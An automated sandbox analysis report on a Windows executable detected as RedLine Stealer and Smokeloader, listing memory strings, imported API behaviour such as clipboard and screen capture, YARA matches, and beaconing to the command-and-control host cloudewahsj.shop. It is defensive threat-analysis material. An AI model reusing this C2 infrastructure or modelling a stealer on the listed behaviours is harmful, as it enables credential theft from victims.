            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cloudewahsj.shop
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.00000000006E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro0
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rdFy6abQ61.exe, 00000000.00000003.1715217454.0000000002E76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000002.1878209398.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/C
            Source: rdFy6abQ61.exe, 00000000.00000003.1698844311.0000000002E3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/api
            Source: rdFy6abQ61.exe, 00000000.00000003.1685024723.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apiP
            Source: rdFy6abQ61.exe, 00000000.00000003.1699010586.000000000071E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apie
            Source: rdFy6abQ61.exe, 00000000.00000003.1684919180.0000000000696000.00000004.00000020.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685024723.0000000000698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudewahsj.shop/apil
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: rdFy6abQ61.exe, 00000000.00000003.1698894593.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1698748994.0000000002E86000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686084920.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rdFy6abQ61.exe, 00000000.00000003.1686206385.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rdFy6abQ61.exe, 00000000.00000003.1685691858.0000000002E78000.00000004.00000800.00020000.00000000.sdmp, rdFy6abQ61.exe, 00000000.00000003.1685617542.0000000002E7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: rdFy6abQ61.exe, 00000000.00000003.1716008947.0000000002F5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00437A60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00437A60 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_00437A60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00437C10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00437C10

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
            Source: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043D0D00_2_0043D0D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040D1720_2_0040D172
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00408A600_2_00408A60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004223700_2_00422370
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00421B300_2_00421B30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00418BA20_2_00418BA2
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004378500_2_00437850
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041906A0_2_0041906A
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004260100_2_00426010
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004438E00_2_004438E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004180F00_2_004180F0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004438F90_2_004438F9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004438FB0_2_004438FB
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004278850_2_00427885
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041D8B00_2_0041D8B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004069500_2_00406950
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004449500_2_00444950
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040E16E0_2_0040E16E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043210B0_2_0043210B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004039100_2_00403910
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004299170_2_00429917
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004061200_2_00406120
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040B92C0_2_0040B92C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042F1C10_2_0042F1C1
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004239EB0_2_004239EB
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004211800_2_00421180
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041618C0_2_0041618C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043099F0_2_0043099F
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041F9A00_2_0041F9A0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041D1B00_2_0041D1B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042E9B00_2_0042E9B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041BA520_2_0041BA52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043025E0_2_0043025E
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042621B0_2_0042621B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042BA200_2_0042BA20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004172220_2_00417222
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00443A300_2_00443A30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004042C00_2_004042C0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00443AC00_2_00443AC0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004302CD0_2_004302CD
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040F2D00_2_0040F2D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004442E00_2_004442E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0040B2800_2_0040B280
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004352B00_2_004352B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00402B400_2_00402B40
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00443B600_2_00443B60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00409B700_2_00409B70
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00429B7B0_2_00429B7B
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042FB7D0_2_0042FB7D
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00405B000_2_00405B00
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00440B000_2_00440B00
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00428B100_2_00428B10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00419B300_2_00419B30
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00411BDE0_2_00411BDE
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004123EC0_2_004123EC
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00428C620_2_00428C62
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043C4600_2_0043C460
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043B4100_2_0043B410
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00441C260_2_00441C26
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00444C200_2_00444C20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004064C00_2_004064C0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042F4E10_2_0042F4E1
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004324EE0_2_004324EE
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041D4A00_2_0041D4A0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00408D100_2_00408D10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043E5200_2_0043E520
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00442DCA0_2_00442DCA
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00415DD80_2_00415DD8
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00425DA00_2_00425DA0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004085B00_2_004085B0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004096600_2_00409660
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00404E200_2_00404E20
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043C6C00_2_0043C6C0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043E6E00_2_0043E6E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004186E50_2_004186E5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004446800_2_00444680
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0041DE900_2_0041DE90
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043CE900_2_0043CE90
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004287500_2_00428750
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043DF600_2_0043DF60
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00429F7C0_2_00429F7C
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004337070_2_00433707
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00402F100_2_00402F10
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004257130_2_00425713
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042F7160_2_0042F716
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004077300_2_00407730
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00427FC00_2_00427FC0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004437D00_2_004437D0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00433FDF0_2_00433FDF
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_004127E00_2_004127E0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042A7F00_2_0042A7F0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_00434FF00_2_00434FF0
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0042AF920_2_0042AF92
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210AA570_2_0210AA57
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F2A470_2_020F2A47
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02107B020_2_02107B02
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FDB170_2_020FDB17
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211D3370_2_0211D337
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F83570_2_020F8357
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E3B770_2_020E3B77
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02124BB70_2_02124BB7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E6BB70_2_020E6BB7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020ED3D90_2_020ED3D9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020EE3D50_2_020EE3D5
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021013E70_2_021013E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E88170_2_020E8817
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F603F0_2_020F603F
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E98C70_2_020E98C7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021248E70_2_021248E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FE0F70_2_020FE0F7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211C9270_2_0211C927
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F79500_2_020F7950
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E79970_2_020E7997
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021089B70_2_021089B7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211E1C70_2_0211E1C7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F1E450_2_020F1E45
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F26530_2_020F2653
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02124E870_2_02124E87
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FD7070_2_020FD707
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E67270_2_020E6727
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E8F770_2_020E8F77
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0211E7870_2_0211E787
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210EC170_2_0210EC17
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FFC070_2_020FFC07
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FD4170_2_020FD417
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02103C520_2_02103C52
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210BC870_2_0210BC87
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0210AC890_2_0210AC89
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020FBCB90_2_020FBCB9
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E8CC70_2_020E8CC7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020EB4E70_2_020EB4E7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021155170_2_02115517
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E45270_2_020E4527
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020EF5370_2_020EF537
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021245470_2_02124547
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E5D670_2_020E5D67
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02120D670_2_02120D67
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_02101D970_2_02101D97
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020E2DA70_2_020E2DA7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_021025D70_2_021025D7
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_020F7DFA0_2_020F7DFA
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 00408280 appears 47 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 020E84E7 appears 65 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 00414C20 appears 145 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: String function: 020F4E87 appears 70 times
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1856
            Source: rdFy6abQ61.exe, 00000000.00000003.1661944358.00000000006B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs rdFy6abQ61.exe
            Source: rdFy6abQ61.exe, 00000000.00000000.1654142175.000000000044E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesOriginal4 vs rdFy6abQ61.exe
            Source: rdFy6abQ61.exeBinary or memory string: OriginalFilenamesOriginal4 vs rdFy6abQ61.exe
            Source: rdFy6abQ61.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: rdFy6abQ61.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_005E07A6 CreateToolhelp32Snapshot,Module32First,0_2_005E07A6
            Source: C:\Users\user\Desktop\rdFy6abQ61.exeCode function: 0_2_0043D0D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,0_2_0043D0D0
